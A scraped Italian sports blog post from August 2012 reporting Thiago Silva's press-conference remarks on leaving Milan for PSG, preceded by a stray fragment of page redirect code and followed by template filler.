location.href='". $red ."';"; exit(); } ?> Notizie 24 News: PSG, presentato alla stampa Thiago Silva: "Sono felice di essere qui, ma il Milan resta nel mio cuore"

Ads 468x60px

Random Post

Template Updates

venerdì 24 agosto 2012

PSG, presentato alla stampa Thiago Silva: "Sono felice di essere qui, ma il Milan resta nel mio cuore"


 



CALCIOMERCATO MILAN PSG THIAGO SILVA CONFERENZA STAMPA - Tempo di presentazioni ufficiali a Parigi per Thiago Silva. Il difensore brasiliano ex Milan sta parlando in conferenza stampa, queste le parole che arrivano da Parigi: "La trattativa tra il PSG e il Milan è stata lunga e difficile ma alla fine sono felice di essere arrivato qui. Devo dire che sono stato trattato molto bene al Milan e ho passato tre anni stupendi a Milano. Ho dato il massimo per il Milan nei tre anni che sono stato li. Voglio precisare che la decisione di andare via è stata mia presa in accordo con il Milan. Ero triste di lasciare il Milan e i suoi tifosi. Il Milan resta nel mio cuore e gli auguro il meglio per il futuro”.

0 commenti:

Posta un commento

 

Sample text

Sample Text

Sample Text